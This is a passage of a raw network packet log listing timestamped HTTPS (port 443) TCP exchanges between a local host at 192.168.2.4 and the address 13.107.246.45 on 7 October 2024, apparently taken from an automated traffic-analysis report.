                                                                                                                                      Oct 7, 2024 03:23:01.456775904 CEST4434976113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.456923962 CEST4434976113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.456994057 CEST49761443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.457282066 CEST49761443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.457282066 CEST49761443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.457288980 CEST4434976113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.457298040 CEST4434976113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.459635019 CEST49765443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.459717989 CEST4434976513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.459805012 CEST49765443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.460113049 CEST49765443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.460149050 CEST4434976513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.461287022 CEST49766443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.461306095 CEST4434976613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.462673903 CEST49766443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.462816000 CEST49766443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.462840080 CEST4434976613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.463037968 CEST4434975913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.463187933 CEST4434975913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.466603994 CEST49759443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.466656923 CEST49759443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.466665030 CEST4434975913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.466676950 CEST49759443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.466682911 CEST4434975913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.468868971 CEST49767443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.468880892 CEST4434976713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:01.469105959 CEST49767443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.469258070 CEST49767443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:01.469269037 CEST4434976713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.087992907 CEST4434976313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.089348078 CEST4434976413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.109540939 CEST4434976613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.110245943 CEST4434976513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.129240990 CEST4434976713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.141989946 CEST49764443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.141992092 CEST49763443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.158128023 CEST49766443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.159085989 CEST49765443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.173248053 CEST49767443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.236905098 CEST49767443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.236918926 CEST4434976713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.237499952 CEST49767443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.237505913 CEST4434976713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.237817049 CEST49765443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.237844944 CEST4434976513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.238311052 CEST49765443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.238322973 CEST4434976513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.238557100 CEST49763443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.238580942 CEST4434976313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.239051104 CEST49763443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.239058971 CEST4434976313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.239321947 CEST49764443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.239326954 CEST4434976413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.239809036 CEST49764443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.239813089 CEST4434976413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.240077019 CEST49766443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.240088940 CEST4434976613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.240545988 CEST49766443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.240556002 CEST4434976613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.334328890 CEST4434976513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.334491968 CEST4434976513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.334655046 CEST49765443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.334755898 CEST4434976713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.334912062 CEST4434976713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.334974051 CEST49767443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.336488008 CEST4434976313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.336594105 CEST4434976413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.336659908 CEST4434976313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.336709023 CEST49763443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.336731911 CEST4434976413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.336781979 CEST49764443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.337656021 CEST4434976613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.337802887 CEST4434976613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.337861061 CEST49766443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.546343088 CEST49765443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.546343088 CEST49765443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.546412945 CEST4434976513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.546449900 CEST4434976513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.547257900 CEST49764443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.547283888 CEST4434976413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.547297001 CEST49764443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.547302961 CEST4434976413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.548254967 CEST49766443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.548255920 CEST49766443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.548321962 CEST4434976613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.548362970 CEST4434976613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.549993038 CEST49767443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.549998045 CEST4434976713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.550021887 CEST49767443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.550024986 CEST4434976713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.550992966 CEST49763443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.551028967 CEST4434976313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.551043034 CEST49763443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.551050901 CEST4434976313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.668386936 CEST49768443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.668417931 CEST4434976813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.668529034 CEST49768443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.669696093 CEST49769443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.669771910 CEST4434976913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.669840097 CEST49769443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.670744896 CEST49770443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.670756102 CEST4434977013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.670809984 CEST49770443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.671269894 CEST49768443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.671283007 CEST4434976813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.672843933 CEST49771443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.672852039 CEST4434977113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.673038960 CEST49771443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.673038960 CEST49771443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.673055887 CEST4434977113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.685211897 CEST49769443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.685235023 CEST4434976913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.685406923 CEST49770443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.685421944 CEST4434977013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.686759949 CEST49772443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.686846972 CEST4434977213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:02.686920881 CEST49772443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.687050104 CEST49772443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:02.687074900 CEST4434977213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.312807083 CEST4434977113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.313611031 CEST49771443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.313620090 CEST4434977113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.314173937 CEST49771443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.314179897 CEST4434977113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.325582027 CEST4434976913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.325613976 CEST4434977013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.326150894 CEST49770443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.326150894 CEST49769443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.326231003 CEST4434977013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.326266050 CEST4434976913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.326436996 CEST49770443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.326448917 CEST4434977013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.326517105 CEST49769443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.326527119 CEST4434976913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.348517895 CEST4434976813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.348956108 CEST49768443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.348968983 CEST4434976813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.349582911 CEST49768443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.349586964 CEST4434976813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.366548061 CEST4434977213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.366923094 CEST49772443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.366982937 CEST4434977213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.367347956 CEST49772443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.367362022 CEST4434977213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.411050081 CEST4434977113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.411220074 CEST4434977113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.411274910 CEST49771443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.412028074 CEST49771443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.412038088 CEST4434977113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.412046909 CEST49771443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.412050009 CEST4434977113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.415141106 CEST49773443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.415232897 CEST4434977313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.415303946 CEST49773443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.415807962 CEST49773443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.415842056 CEST4434977313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.424350023 CEST4434977013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.424499035 CEST4434977013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.424567938 CEST49770443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.424632072 CEST49770443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.424632072 CEST49770443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.424669027 CEST4434977013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.424698114 CEST4434977013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.426491976 CEST49774443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.426517963 CEST4434977413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.426604986 CEST49774443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.426714897 CEST49774443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.426734924 CEST4434977413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.428951025 CEST4434976913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.429105043 CEST4434976913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.429163933 CEST49769443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.429255009 CEST49769443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.429255009 CEST49769443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.429270029 CEST4434976913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.429289103 CEST4434976913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.431076050 CEST49775443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.431135893 CEST4434977513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.431216955 CEST49775443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.431313992 CEST49775443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.431334019 CEST4434977513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.453794956 CEST4434976813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.453943968 CEST4434976813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.454009056 CEST49768443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.454039097 CEST49768443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.454046011 CEST4434976813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.454057932 CEST49768443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.454061985 CEST4434976813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.455821991 CEST49776443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.455904007 CEST4434977613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.455991983 CEST49776443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.456094980 CEST49776443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.456119061 CEST4434977613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.470395088 CEST4434977213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.470554113 CEST4434977213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.470630884 CEST49772443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.470630884 CEST49772443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.470670938 CEST49772443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.470690012 CEST4434977213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.472351074 CEST49777443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.472383976 CEST4434977713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:03.472453117 CEST49777443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.472558022 CEST49777443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:03.472569942 CEST4434977713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.064508915 CEST4434977313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.065105915 CEST49773443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.065149069 CEST4434977313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.065542936 CEST49773443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.065551996 CEST4434977313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.069267988 CEST4434977513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.069618940 CEST49775443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.069664001 CEST4434977513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.069930077 CEST49775443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.069946051 CEST4434977513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.076087952 CEST4434977413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.076412916 CEST49774443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.076476097 CEST4434977413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.076725006 CEST49774443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.076738119 CEST4434977413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.097259045 CEST4434977613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.097667933 CEST49776443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.097706079 CEST4434977613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.098022938 CEST49776443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.098038912 CEST4434977613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.125981092 CEST4434977713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.126506090 CEST49777443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.126518965 CEST4434977713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.126873970 CEST49777443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.126879930 CEST4434977713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.162594080 CEST4434977313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.162731886 CEST4434977313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.162811995 CEST49773443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.162879944 CEST49773443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.162916899 CEST4434977313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.162945032 CEST49773443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.162959099 CEST4434977313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.165468931 CEST49778443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.165498018 CEST4434977813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.165575981 CEST49778443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.165729046 CEST49778443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.165745020 CEST4434977813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.167079926 CEST4434977513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.167223930 CEST4434977513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.167292118 CEST49775443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.167347908 CEST49775443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.167347908 CEST49775443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.167380095 CEST4434977513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.167418003 CEST4434977513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.169991970 CEST49779443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.170063019 CEST4434977913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.170146942 CEST49779443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.170334101 CEST49779443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.170361996 CEST4434977913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.176887035 CEST4434977413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.177082062 CEST4434977413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.177174091 CEST49774443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.177213907 CEST49774443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.177248955 CEST4434977413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.177272081 CEST49774443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.177283049 CEST4434977413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.187220097 CEST49780443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.187252045 CEST4434978013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.187345028 CEST49780443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.187453985 CEST49780443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.187462091 CEST4434978013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.197727919 CEST4434977613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.197868109 CEST4434977613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.197941065 CEST49776443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.198112011 CEST49776443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.198143959 CEST4434977613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.198179960 CEST49776443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.198193073 CEST4434977613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.200320959 CEST49781443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.200372934 CEST4434978113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.200453043 CEST49781443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.200658083 CEST49781443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.200674057 CEST4434978113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.227137089 CEST4434977713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.227210045 CEST4434977713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.227266073 CEST49777443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.227428913 CEST49777443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.227440119 CEST4434977713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.227449894 CEST49777443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.227454901 CEST4434977713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.229748011 CEST49782443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.229763985 CEST4434978213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.229840040 CEST49782443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.230035067 CEST49782443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.230047941 CEST4434978213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.809492111 CEST4434977913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.810225964 CEST49779443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.810256004 CEST4434977913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.810854912 CEST49779443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.810868979 CEST4434977913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.811315060 CEST4434977813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.811954975 CEST49778443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.811980963 CEST4434977813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.812392950 CEST49778443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.812400103 CEST4434977813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.827003956 CEST4434978013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.827388048 CEST49780443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:04.827413082 CEST4434978013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:04.827929974 CEST49780443192.168.2.413.107.246.45
